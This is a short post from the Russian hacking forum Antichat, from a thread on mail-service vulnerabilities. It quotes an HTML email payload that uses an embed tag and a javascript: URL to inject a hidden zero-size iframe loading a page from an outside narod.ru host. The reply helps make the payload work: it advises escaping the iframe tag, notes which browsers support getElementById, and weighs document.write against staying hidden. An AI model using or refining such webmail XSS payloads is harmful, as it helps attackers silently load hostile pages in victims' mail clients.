HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.07.2004, 18:06
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
С нами: 11627066

Репутация: 42
По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 21 2004,15:19)</td></tr><tr><td id="QUOTE">я отправил на тестовый мыльник письмо в html виде с кодом </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><embed src="javascript:status=location;document.getElemen tById('xxx').innerHTML='<iframe src=http://asdfg178.narod.ru/jopa.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>[/QUOTE]<span id='postcolor'>
тока нихрена не работает [/QUOTE]<span id='postcolor'>
Ну во-первых у тебя &lt;iframe&gt; не заменен спец.символами. Поэтому он будет смотерться как &lt;xiframe&gt;.
Во-вторых getElementById объект DOM поддерживается ТОЧНО, только IE, насчет NN не знаю. А вот знаю что не поддерживается Оперой(хотя, бывают новые версии)). Для оперы можно сделать document.write, но тогда вся конспирация летит к чертям)
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.